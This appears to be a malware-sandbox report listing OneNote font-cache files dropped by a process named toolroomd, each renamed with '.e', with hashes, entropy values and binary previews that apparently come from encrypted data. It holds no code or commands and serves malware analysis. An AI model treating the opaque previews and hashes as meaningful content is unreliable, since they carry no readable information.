Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...m..HL..P...l....W.,<..v,.!...bF0.."....h._s..;..a.b. .8.Ir...N:.M.a..J..^.+,....ze.....'3a.u.s(....G..a...D........L.<.!.81..2...R..i..t&.c.n.g...?.......we...x^........yo...B....E.M.[IK4.Q.Q#...p.&....ex..9........>E....[....u4.8........^i.J.....\|Y......O.?.O%........O3T{....T...Uz..)x..r%..85..B@;...x3....+.M..r~.r..,t.p.oo..q.=.>...T....w...W`eNC...p.._...Y+.M.&....,{.~o..x?...W..)..w...../.e..3.~..:S.T..x..r.....A4..a.....p...2z.:[ym.7.<:.?.y...B..Np;/.q.E...X..u.5.....<0'.<.........p...2.]T\u...........`.}..d},....f.......l.u5w.v..X.&x.,.m.@.HA4.dBp.1v.^....v.....".b.+W..(.....hs.......5.R:z....q..TE^&.er........C...b9.......&.z.TY./.4......JS...i+(/..^^.......dBB[...a^.)D......6C....g..%k..=..P..+...T.s..g....A+...t../1.C.HD....43Utm....l.......E.a..^3.9<....^q...<6.c...d........ u{.].Zu9...[x..X....b.a...,..L..4.CS ...%..s..C..............\|.U...".#..!...0.R...n.......m..&.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bodoni OrnamentsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1834
Entropy (8bit):	7.618627563701492
Encrypted:	false
SSDEEP:	48:EHTia19CMMrfekg6Zusg7dn7a4MSOFZHzKfzLSlLd2jSVNpq:+1oMR6ZupOVrz8W32jMu
MD5:	BBF38305103EB6D531A0BFC3A96DD63A
SHA1:	15A129E0B88D8116678DB5ACD1E38A4258B8F4C2
SHA-256:	E37EBA7EFA0E18892D66E5FAA9F1971256DD871AEAC136E8C1B2D055E6FF6620
SHA-512:	C3D004AC1B47FD39F80006E59008AF0280E38A2B7EAD4FD197385DE03089880786287AB106A1DDF23ED17E29172743907351B76BC21175CC013205806255E21D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.al,..I\|Q.8.U.nc...a.].O..JE.g.u..C"..F..q.,[......[...oM,.....\|T.e..].."....u..v....0e..5....P.>...4\=..a....b..w....o.?....o.?.4.....>.....y..d. .Dz.......:N....S8{.q.^..61M.n.{'m?.!.M........_/c..i.\|..[..t...8....6..OP.....r...`.......$u.:..Yu.y"=..r.!._;-.....r."..w..o...:5...[.2.{....0.D...\....>......6.M..3b....?swH..h.u..Y.G4...~.@....z.'`.l..U...y.i\.A..7.....@C....l.2..,.h....T.Y7li[..K..O.K..>V......Ym...BP.\|.0..../.<...}.]%...5.&.v..D..:.Mf.._..T.}Y..bs....2.f...Kwq..n...8.^..9._..77.....<.o.`..To.C{.....v..Rn^4..{9E...6I...'.....p.H...(MX...l..U....P..^.F.r...t6fV.Iv.Ks....{..d......v...c.6G...V....y..S.s}.........=j2.4..<G.!.B.4...XK>x1........Fc...wU..x..b....d..M..L...1...P..)....`.\........Wc.......:._.1)dV.8...O.}..PA<.. ?....m...8..t6o.K..: ....$AG.-..J&q...y%..#.l...$%...v..,...&...>....'......7..T..va...r.?)VP5.IK`.q0...&...../.,....uh..IE....*...U.'.a.-..6.....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Bradley HandBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2122
Entropy (8bit):	7.691682974549143
Encrypted:	false
SSDEEP:	48:EPGF0VgnRZpbXxd6B4qdDEQ9wHbxirroumEB5tuZdSRoYKNpq:OGyGvCB6KWx3uF5tuZn7u
MD5:	7EBA8E54BB6A4C0A6663816369FF1376
SHA1:	4A9EBC522007A78D65A45B31451681A75212702A
SHA-256:	FE272A2DB8425F0150C4118B2F5BFAFFF88767C45F71E626DAAFF342ADBD64F4
SHA-512:	F1EAB736B62A47FF376990726A5D0204D7CFFC28EA1480D5DD23B3022A20004975FD6F87BE6F5310E9E68674B96F61A4D3E29928EA27E015B2D4A363976DF05E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a,.c.Fq.-..+tWJ.j..'`..f."#...fw...21...a..OG...yy.N.9E".M..?.hZ..[..e.A).).kk{5)..vC.Z.&Rry.h.v.Hl.An.....A,hLfC..B.hLfC..B..h.u.7f.....l.......#9!.....N....z...H..brpU...$,.......E..GA.ip.o.3.5.vT.}K...6....g=@...4Vo..B.......:9.6>..;.U..rA\|...... ...#.s........KI....;.."....3S........"q..@.+!r.7.........`G.W..E.........g..M....&...\|....r..>YL=......G....h;.jt....4-..j..U..wa.UTQ.6.J...a.Cm......'..h.....p.-....dL.OD.(I..;..k<..%......LF...9...(.. ...../mR.%r.D!.bV.... ........y...@.......P.w.._..l{.......~/RL?......,W.&..>e.b......&.`yx.=]..O....._.....^f]{.9......~...Pujhl5.b<4K9..$..}E....A..,t%.v..D..9_....]...%./.F.:..\..n.9.M8j.I8w.i.F1+......-./5<._...B...1..\...9\|6`.=..D*%$..N..z'm..b.K.z..d.......y...V,.......)M._...c...X..4~........uz7.2./s.........t.'.4.a....../.....}.)...P...FP.A.f.................y...gxZ.^......T.\..N....#.4.p7.....(~1i....uu.uX`?...OOC..i..#.Ef...:&3....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Brush Script MTItalic.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1906
Entropy (8bit):	7.648808934078049
Encrypted:	false
SSDEEP:	48:E3s7G2+T6DjboGY7yYUtRgY7GOqAYHw7g4iwNpq:F7YT6roGY7pUXgY7GOQuJiwu
MD5:	4F935CD56A99C7CCDEB446AD2B266551
SHA1:	69193643A37D555C96D4EA70471CDB79B4DCA90C
SHA-256:	4A923C8801E3656173F37808664B639CBD834636F9984A697F98E1E92FE3ECBF
SHA-512:	3A0C8353151C4EA1DCB098B27A63B82DCD38E655943E0B5CA21FDCB848AC3358B2FC9F6A53BD11386C76353139A59A21013F8FD7AECCB510D2E920E9E228FC85
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a./iV..V.%)......#b...:d.?..I[Y.O.../...`t]{Q...+......\0.}..Vb...:K...u...9^...W9..K..3#....mG.!.R.s.P.8t=....8t=....8t=....N............0.l...>........r....Z;.N...$.Y"O..DW..)fa.u.82...G.......1.........Gce........k.U.......8u......'....;...GN.....K...FiS.YwP&....+W..].C..?.U..~^(..n...%.l..+.....aS.......X.eF.=..`......j..m2..{.P.P6...D....RV.w.....J:.J......'d...$....keu$.............l.^.n..m..I.!.^.:1.Z..c..RNwk.b.t,..e.^Y.!..1...eO]..x..+..,i;.\....o+..Hm.r.a.7.H..{....I\|O.$z#_../...H\=..-.sf...t+.l..A.f....&.1..k%c.H8..?....$..#..,.VcI..\....t.-. ..,..$.k.G...R......8x.......kYaL..f..W....].. ._.y.........E........z.XMp.....R)..T.T.T.nS.....3n.%H....K.Qp..z..Z;FM....~.......U5Na...#....~.4.......!...g...@.....l@Az.....i.......<..D..@......~.4..d..`.....V...@.Iv....k....U.....7....E.X0PjM..[..k8.......OMC...._..Qz.M...Z....o....BHD-...5.\|^......o.VK..$...wwn^...."......L..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CalibriRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1114
Entropy (8bit):	7.2769644238589
Encrypted:	false
SSDEEP:	24:EFLDf3Rr45ocMe6BDVckfywYcUJ2GWXisAWxzGsePc0m7:ExRkIe6BWk+F2GWX/iNpq
MD5:	6AE746806A029E610D820E36182FA0EF
SHA1:	EDAF792DBD5AE77342747A80B97E77FE9E23C445
SHA-256:	225EE40904CC0A62EF09CFD64F6B58EB178C443AF30A460069F3650259BB2217
SHA-512:	ADA367EFADDE24CC84FCEFC17C4949B27247B13D8A8D4A0F06B59E48E1054DF648F11A94F98F3BC26DE3D09207C4E35B8B3C95646667E753B39EC20994CC7A80
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aC.q-.wb6...X.g.=.Z..I.b.e...D....M.'....El..q.......5..(G..oX...s.xo...Z.x..;...a..............u>/.h.`..7-l.nT;..Ni.......$B%".o./.-.vB........H.tb...0.7.z.L.,.eN.Iy.j..............Rt..^.{.g.e-\|....p.Q..z.\t.. L.f.'^{...j/........#..)...j.3H..j....}..J..uj....N....?P-.. .D<..&o\|.MRW..Q9.<..MK............_...R.u;........Gk.\..p.q...J.Bu...q6..o/.of....W..}..e(D~..m,\...5.Oa,..7....}.......iX.$".59.\.z.'..np:....3I....v.e.........."..E.~.y.%i?`gz..\|.K..W...Rt....6e3..s....>.....#......Z.....G..].^...\|.. .k.&...<_..~...5...K...I..........."e...T..B.HX..i....Y....,....s.....V-..]j..o....0.rX....:.u..bN...S..6l..j..3B.Nh..o..C.x.a&.......S..x.........y...d...3.w&.[.].....$v@.;.Z7.E\.:........).................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Cambria MathRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1762
Entropy (8bit):	7.589700049337921
Encrypted:	false
SSDEEP:	48:EVkrXrRTSWefe4cTnfEGr74pQm6IQMhKeX8nIZhNpq:h7RTNePinfvY56qt8+u
MD5:	3414D163E5696831F5715F2A255202C7
SHA1:	DE0203D51CE443FB18E9212C542ED4ABA5551D10
SHA-256:	5C3DFBA3764ECD57E226EAD8F88909C05ED87F09E8EADDCE0F5FCB13437AA030
SHA-512:	BDB8819418998C4B5FD3A5EA5E0A1AA46E1E6E845D5C6C1DC2C6544F54D17B70533E3B8CEBF2224CF7330BA62A29AE1F4746515D76D2079C2A04E432D9B8519D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...[y..:...3..M....B:..1ih.;n.$....^^.W.......;.s.....R5.y../cV....b.7K>.....>y<.....Q.B=D.!.W.H(+...V..).v......>....'.>....'t...B..XM.h...jtXP..1.n.0..'....[o..p..c..y\.?..5........V...d._..~.D5.S.{..Q...3...(._1....Q.l.f..pt.&7;..\!...j..!.w.gp-Y..5Z pL....t...=A........G..Jf.?...d..J......i..#4q..3...K........#=I...i.....f..6Cx..+..L[...\..K.2.k.G.W..D... >.?...7..(......v.~."SG....}..b.` ..I.Z.[....;/.....q..`QX.a...$..&....6?m.D.P.........d.}-.m......\.[.D.3.y.$..8&C.J~.~..q....._.)`(......K.....zJ3.?..U.x.....c.T/.].w..d}..~+.]...z....v:._........#.. .{..\|[.W..Y....x..h.........57..}..%..H....f.K...O..9.......9..N.e..Q(.$..7;N......~N2...]..;..GF...%..~..~....%j$\...rq.g..w.m%....T.H..t..,..#..@.=.(dW....}..]..M......$l9U?=D.v...E.^....WLP/....tb....y.....X ...0.W0F.....n........%...O....Zv.../.&(.../d..1Qv.l<.....~}l.Y..tI.U.ZP..D.(.z2.6..z{.K.....N............\..M..."

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CambriaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1298
Entropy (8bit):	7.381379327603403
Encrypted:	false
SSDEEP:	24:Ed124Hg8SR6j4UZ4l4L42GsUBoTPM1RRRPRNfOsePc0m7:EH/A8Z4UZ4eGRGTPyRPPRNfONpq
MD5:	611DF28AD3FC479C637393161377F644
SHA1:	EA52D2BC7A85D437E3478ED75B67FA2F8B508A4E
SHA-256:	E98ADF817A8DD02326932CB8518ABC1878D897E6530A5DF0A34B6ECA391703D2
SHA-512:	CDBA1DAC6380D327D4A39BA42AB0D6C4207F5D6D1CC6C8FF6E65DF37378C2006545005B59CA94410B3BCA0E75194D0D3F9553C3A4040FEADB8ED42C9320BCB75
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.c..!......T4.c...y.]..0r...U....C.}.....n.X.I(..j.G.DG."`.P.K.'..\.0Y9...s.Y.VBZyQ..^g..\|....+..n{.................G.....WQ.E.T.......:7...n.C..H..C.V"..../Dc...o.&-..A.(j..y.s.{S'.".....!...%L.MrL.z.R._.!6..k.nC..;<.h.)W...S6^..,.Vi...V..a;#...../[{,....@.....U....jZ.K..vp...r{..kY..U5..<^.fw..5.*-$..r..p.$..;..G.-....sRs...).u..`..........}..OeH.ta.d:..U.P..g.Rmn.$...pQ..S.F/8.]...e...A?....,..[.1....V...h..c...L..BG..B.........:..W....:....~...:.....~............<D+.....C.....7.V..k.mz....p.).5.$F.n.91...^.1.z.z.t.s.z..X.rNO.....V.`.....,...$BJ..d-.k...b..C..Z...yD@TJ..K8zBh.'...?.......S.eq......(...%......6(8......x"C.+L....`{K...GZ.......O.vH#n0.....;2............^"&...r.k64.(...M..{..........0....V....,..n........})...M.q@O,.,...d5..!...............n......W.~.^.c_M.c.t.5C...........K(.......5......pR...<.....HWb...l.t......:..d:~o..O......uF5.7..-..A%.....0.$j=%...\|.eQ.........

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CandaraRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1370
Entropy (8bit):	7.417529623786989
Encrypted:	false
SSDEEP:	24:E7cg19WyAV/HIwCaMeThOpjsVDkX1y7DzC9sePc0m7:E7rjAV/oIMS6o9klybC9Npq
MD5:	0BCF5DF50937BD17E3635BB9205624AF
SHA1:	B487DD1026317BB0486DE8E3F1A43FC159650AED
SHA-256:	5D1BE48B97C34D0A4F20A18670C9E30A90B9A80CEBEBF0194D0179489A95D6A5
SHA-512:	C02BDB6AD924F682F499D34CADEBAF4E159A12107CA86F0C3F9E731D1DD0F9F9502F4B69BDBB30630F3D1F9B97CCA4F9FF869E0917CE1F17A0BDF418E687D2DD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.an......b.F9..1..F..n_J.HM4.{&T.j...q...'.#.5..F..J..+\.S.....P.l(K`.i....._..Y..]z..PR...T.Y.9g.9K.d..T.]^m.1m......:/vS..TNK.....i.nnV..8s.D.9d..vi.gz.^..R-.{..n.G..lD.wQx].K...:<.."..b.[i..=..G.:7.i.......;...^.~.a.&?t.w...v..0...V.7b.`A\|....A&W-..i.JU.G.uc.P.K.Y$.....n......W)D..n.'....d8WW...f(...#!$..}L`.8..nf.eRZ.U...;4@4..d...:.PX.]..=N...$.+xA...(....D...XX...+}.D..j./[.)..E..n.2.@.f......NJJ\|..N..m..gj,t;..J#..%...a.9o.4.78F8.#1....#.Jr}......G,s`P_Z9..I..D.D..........Dp.........gD...Y.<l.F=....+....lH..o... .l.?....... &..e$S..c...+.yT..7H.;M..l......px.$p.&u........S.......S......~e...]..3.{..P........R.T.F.9.6.S..Z ....4.5..X.:.d&..\|....Y..}Y....f....$<..R\|.....qZ.....I<.[B...zk;...A._..CwU'...T.9vS..}....zO...s..H..I=o.....wm .ZR...Hg.....y.4.l5G..P\|...G;..n.h5.7.h.PR_.....v....3.%.QB..E: ..{*4...Iq6.A.6$\|..8T..f7.....&..+EK.!...]y.....}...n4x.V...}........m.Ssj.......

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Chalkboard SERegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1922
Entropy (8bit):	7.637925895883386
Encrypted:	false
SSDEEP:	48:EzWcBRc78sWHmsIvz62oqkV7mfVDx1BNpq:6S8sWH/bFmf3u
MD5:	3631A55938D4F27F58E64789F1B217CB
SHA1:	A947022DB888E3C04353780FFDA15A7BD807CD70
SHA-256:	CC343D553C0FAB8C43EEEE985FB7F9BFC217C9DB1045C543EF282E37D1E68924
SHA-512:	013A4787B6F1C802C4AADA81300F3FE27B778C75FF761B13BD0949A14B87890E83087A918020CDB3419A0DBFEB6A8F884BA38D463ACAD73B4576A2CAE098FBBF
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..6...w.[...>.6V.vHN..D....%.J.....~.6...H....m........fB>.>.T'.v.....F...n(.....7M.L.......x.&e.q...7~.:.....:.....:.....kQ.l..xI...........R...6..K..07.....cW..X..@.K.P.x.X.."....vA.u....h..yY......4.g'FQX..]...a.4....\.{.g6F..`L..4...i<.\|e$......nq.T..\.X4......Z....aW..g..c........\....t..a..a...Cu=;../.Q.2....gZ.99.8e...6..h..v95..Q.i.....>...-R..f.n.b6..Z..3..G...y.......RU..d.....).I....8Jf.\p.C@...>}....y..<.{....-d.>..g...O}R..Y.^..-_..z,..#.{!....w.Y....b;..<...oN:.Z..i?...j....r..v/.%..T.(..D'...\|.'.........y..Yo...5.+}.CX.....4_.e.........sw!.......>.;..v..."/uH...oG.#..H.u.O...9.@.1..pY...k..."K..e.!......X.<.i4#....GJ.X.H..d..T......k.&2....&.+..v.MS)..O@....=.0....Ow.Z..\.!..s.7Gu6.i.v.....y....8...M].cd..u.< 4V$.j........D..).$....].V(?m..N.......`1..vxx.T.N{.....v.ei m@V....BW(..'Z.r..45..h...(....g.\.0.s..\.$..W..*.G....!h...dP.Oq....Q......B......_.$..Mh.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ChalkboardRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1602
Entropy (8bit):	7.544830792958256
Encrypted:	false
SSDEEP:	24:E++NPeHrGblbZfjniGjUB8FPMDKyxPuUSWCzc++sVJvIqQWb/sePc0m7:EvErGJRTvUB8FPmKylSIoJL7b/Npq
MD5:	36BCD77B26440033F5ADEDD238FF7A8E
SHA1:	8224AC8C2509F053A3F852FA0158C90660673F7C
SHA-256:	DD2D5E5CD61B2A0D4C07EBC98BB627BB8ADB2401C76C9051998DAF668FF9F842
SHA-512:	18F3B7FE0DDC042E2C5B1CD2BD2AAB7A31AE8F8F75613259086466FD5710F9231CCF92015CE66CEC40E12D800EDACDA86CDD14193D4874F392590400DD9FC867
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...........~....:6\....xQQ.2...l.....>l..>....j^z..<e02.i..f...HDW.z.Ng...b$U..i.m0...`.AA_......c.=...H......IM....MQ......=...83..y.DU.jE..W..R.7i.....:...z.....\|.....s.w.....5..".\|.^.h....7.D.s.LwK.&\....Il..h.E..A..........8&Jy..1.z.).Y+..>. .........eo.._.......].c.M.Px.WU..e.M..D....A..5.;c.P.#.tQ..R^..b.t..$...o.W....o...C.$B.#.Sn....y..._Z..Ov./..S.si;...0O.....ZFY .d... .u.^.l..No8.q......4.Xt.C.V....8.w .P.W....t0Q...q....>.{\...u..l.Z.N.H..'..2.V...o-.....(lU.G....<.E3.u.+..^;.....Rd..bV.I.6^.Hw.qY..!7v...@.....,.@..]v....sR..B..k....X\.M... w..+. ^...;]r.....J,cW\|.N.....c.@.U..X..@L8n....\j..f/...5g.G...)...6{....~.7..d.......Q.2f6@f.8..~d4#......\........H.F..7`...@V......@y.vb.\t.;.....8..._[..x...?......-.D..ws......qT..G.<.R.y..0..`..!.........h.8?.J^.q....=i]....R.[.......7.......S...y..9_.H....v...~tV.n.......t..!.......S......e..y..4..@.....f..rF.j.At=\W=P.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ChalkdusterRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.645147689260906
Encrypted:	false
SSDEEP:	48:EKZ7Klp9j6jR+p9sJOkKHXJULzAnaeymdA46E9y/Npq:ab56c92Oj+LzWaciFE9cu
MD5:	9638CA17D86260D9C01672F6F731F8E1
SHA1:	405A229B0336742CC4CDA9D7AF1FAA905A228197
SHA-256:	B503E67AB6C80C3CBDF4E2DE83DF6439A72BEC901480FEB9E95B0ADE75A0CD47
SHA-512:	AA0673C2853174E63D914F73D629564CBAE4EAF6FEC85642F305E4EBB3487A801E9097D6C16213EE0332CCB509AF111BF199676592A9CCECF66682AAC5C65299
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.....I....Ms.H.z..\.(.%.)Z.".,..0........-V.....,... ?./...6A......U".8.G}.....p...F.Xx..4.1..=..0e....F..>.[.."YPDm.N.........!PP..}.rK..6...d.0.E....Z.~6!..W..`T..s...o.......,r#JN+0.m..0..y.....}....~....-.iH.j9_...L...I\..T..=.(6..q.........V..b....a...7..H.....SG....:9A.....K.1.....6-FX.8.&'o.0.v...\..h.@-.-J3.'......w.$Nt.)..N ...w.u..b..QQ..0...G.A[.;.G....?..R..U.~.\tW....Z..<.J[.3.i.K*..K$..y1.X.\{.m..<.~.t...KN..E..V.J .....X[........qf..].4....T=.Q.Z...H....E'...H"...!>.jwXj.@.....gAIx...%.<.x.-.b...\Jig.`>..:+.g...bL..M.[..w<"....\|..?....h...0s.......K.Q..v.\.....sb...v....0r.....S..}7.#.B..:...p...g...;@....b.]L...h.=G..g4P'].}...1..H.....N@...dp.R..".......o.F..fH..O.....+?..zU.r.._k.a.....Q..L..0Y..L....u.....D..ba.Bu...n.........NtR.<tE......>...I.u.....TX......@^..3..w..<w....~..p......R.(.....i.v...K6R...ojpb.Ro.........?.'..{.$...u...Q.E6CN..`........y`.G...G

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CharterRoman.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1130
Entropy (8bit):	7.280410061868784
Encrypted:	false
SSDEEP:	24:EaLH9sW9OImGaPLdLLcMLr2Yrr5NyaQenuMGqwGmtllGsePc0m7:Ea7OW9OnBFlrxH2aVnuxqjmXlGNpq
MD5:	A83B443B231D869A651AE8AE83D8BE70
SHA1:	848DA285FF034767C96F760F0B2DD539BEFDAEFE
SHA-256:	EBBFC169106E2777475E7B2BD38D952509458E2739D74B66E34080CDAE8EA103
SHA-512:	9506F3A2E3D91A030B6F461F359CE3A2090712F59F1514D88EA694FAA90C2E98AE50A4F4967D2868102D88B4C8FD4E09C9899B95C902EFE1D26A21137108E8F6
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.5...)b...>..Q,...\...R...X.j.Xz..q..?X.&4.........{..W..N...joq.R..{.6L....L..>.U..@....j....%g4y6.....F.H%0A.G.6 ....RpT..y....."..)'.l.....]X}^.i...-......J9su..s.[R=I...Ev..^j...)Wh....f..&.7Y2..\..EH..;.lAI...hT.T.........0T.?.bOo[.....iS#.J...O.M.E.).)...0....L.R.E...j.t>....Nf..I.6.......\|.4.n.O....>i.....O.m.n8.E.,{X.aY....:.....$..-s.<..b2......01.i...I.lmF..:....%.f....\|.....1....`..../.m....A..6..BT.juiJ...8...e^>..T.....ly.F..=8...1._;.... ...0.~?..p.............>......KO..0~.u=..]t:..E....$......D~t..K......&9.i........\|.;^.2..=%..z...~_.....v..~..q.J...<..}.I.q~/P.Y..k....l{.........`..:K.e..a...C...........q...q....i..6A8.t...e.......<.<...j.>.....'.G..x]V....#........9[!.E...izBPWy....O..T.N.h.c.0.$j=%..E..+..,..9.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CochinRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1170
Entropy (8bit):	7.301695921658724
Encrypted:	false
SSDEEP:	12:WvyOK6FENLQGQ9afhkm0nQfYrnzZrd1as90X4/ao8FnTiasewLYTc+qGm7:EKqELgsiR6YVd1au0ICo81RsePc0m7
MD5:	23D21748A9254E345257D8C5BF55E267
SHA1:	160B82CA5B1FB3ACD5164B3CA53EB45C7EC577A2
SHA-256:	69CDF33188A4D683CD10D0B8E86A8F01F06A697BAE5BD190DD0EA44F618D6956
SHA-512:	53A96E2582FA18C9E75178D8BC7B21386DFE091C6D1B657015E4F10BA66C0D8A2A6434E8E06BDD7ACE7429DCA4ED6D3A9F1AB45D4CB4A130E5A80B1F72ACAF30
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a4....4Q.1h....a.?v..l.......,/...I....#.3..1...'...&i7....:.[c..s.......I....>.Bi...q..e...z..............Z..=.k!..........I..;<...=..).;.$f.s...:N...,9.[.~..Bu.o...J}}..e.gSD....a.......ik....Gx....p.c3D....+...;..`..AYx......07.C`Z.....}...Z....-M.......PP....Z...s.6\(`.....n..n..Cp.{q.\|r}_o....O..sk...9...i.i..............d.}..T.6..S7?....O......M..{t2.D......../......(F.u..........C..n9...U.......Y-+i.._.S.N.-a..P...;A..mj..@....+.'.........2\|.<....2.H........2...e.)..O.4.f0...9X.D.V....Kw..q.o.D..6.B..@.,....~....'...D.........y.$....3.&Y)L3.k..H..,.^..d..I....#0.I......x.43....`....I"...x7lJ.U.u........k......z.rT..p..~.@{n`........P..]".YdI.'........<...>....l.6..(.)y.......C...-...+...a...bj.f...l...4\.......k.....'.G...)..49B..Z7.E\.:NtR.<tE..a.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Comic Sans MSRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1826
Entropy (8bit):	7.594203711178775
Encrypted:	false
SSDEEP:	24:E9MrYQ304I1EevDDb+WD4jeNFOiKFkK2qPe10hRLOSWCnUGBatrrrVJ5LjU8sePw:ExQWuA3EjTBUqPe1mu7r/VJtzNpq
MD5:	C7375FF1E61AC1747B6A754D34508E1F
SHA1:	7AD1ED922F3EB1F564882FEBC66EB18CA357F5DE
SHA-256:	D50003894E38DC4B2AC5EA567E0B4DD6020D9FFFE92AFC2706CE246349B3AF24
SHA-512:	04510CFCC9B0D778244F9E0B71CA44C5F71E830638D3C8EA97C7D3DD12956DFEDCF0006579352389D1D8D8D79C64D066027E52C21F84686EF3BD3834DD61B26C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.U.~.+s@.B.o...#E.....I.y...8.3..aj ..pDv...IMMx.....b.W......d..1.+.tN.z....9...2.s........"]..yR.^U.9@.q9....]h...]h...]h.."N...-....c3.$.o.S...F.P....p+_iL86z...i:.L.....V...N}o.M.6#s......m21\.....-<....j..J....&..2v.C..RM......s.....6.Y..oZ.\|.....W..`3f.....3(...........o.<....N..m.M.M\|....1...v~.NK..1.....G..../.... ....v.b..b...Ux\._../.+q.5.~4.N.D.WQ....c!...'.>.......+@t..x6.N.fm.M6...J...h+Qt..]..V.'..J.]..V..K..Z...un.>7..V.\|7.]...JP:.\x....5nrs...K.+.......6..{.+s..^.;G.....?b....:......JS...Y4...y..b...1j.0.hl.(y.M...!.>.1S.:....g..[......Z..'.2B7.H.D.....QK...j...K.#-.]......X....u=FS...v...6;..h..q".,..;hV8.....V./O.?.T..zI.}.f.`C..............h%O!.+...u.h.....n-'4..8....jN/..o.&SS]....k...c...@p?...p.ax...c....4..V....1.[....."..uox. y?.K0..........?.,.........x...G.h....*.oB.H.(........_b.j3..2...d.-.}.%..(.;.m.I(.....B...P..Y.L....A.V..Iw.W..o..2e..<........N....c..Z

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ConsolasRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1450
Entropy (8bit):	7.455745857197239
Encrypted:	false
SSDEEP:	24:EtVlI77nJLNuBuGHhuBjJFjgGjK29ZfdMhMc+RnSgmsePc0m7:EtVuHfuBxScO9ZGhMcUmNpq
MD5:	4E772712B93E09CBADB21CC86FE71069
SHA1:	7D4EBCE29E40591642073593AFDDFACDA2C9F730
SHA-256:	0030DD26E2CFE7CFA02CB9EDF71F5AD1F0AB528C27179D16C0C18EBB1CBC7DF0
SHA-512:	86AC4874C53773DA413C48F2C48BCF23600E2DF62404294B8C7831711010CC132C9192FF7E825CE5DC1DCD9CD9F753FB0511A1A7690EC5F823FB6117130CDC11
Malicious:	false
